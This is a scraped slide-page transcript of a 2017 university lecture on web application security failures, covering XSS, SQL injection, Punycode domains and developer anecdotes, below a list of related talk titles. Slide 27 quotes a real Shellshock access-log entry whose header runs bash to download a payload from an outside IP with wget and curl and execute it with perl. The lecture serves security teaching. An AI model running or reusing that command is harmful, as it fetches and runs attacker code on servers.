"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 

Webapp security-tut-2017

  • 1. HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
  • 2. FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
  • 3. AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
  • 5. ”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
  • 6. Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
  • 8. GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
  • 9. RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
  • 10. DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
  • 11. SOMETHING UNTHINKABLE It’s the same story every day..
  • 13. UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
  • 14. A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
  • 15. WHAT THE ACTUAL **** ??
  • 17. THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
  • 19. JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
  • 20. The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
  • 22. LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
  • 23. SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
  • 25. LOGIC ATTACKS ARE DIFFICULT › Real example..
  • 27. FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
  • 28. WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
  • 29. DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
  • 30. SOME FAILS 2016-­2017 Stories from the trenches
  • 31. FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
  • 32. Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
  • 33. FAIL 3: “I ACCIDENTALLY”
  • 34. STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
  • 35. ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
  • 36. FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /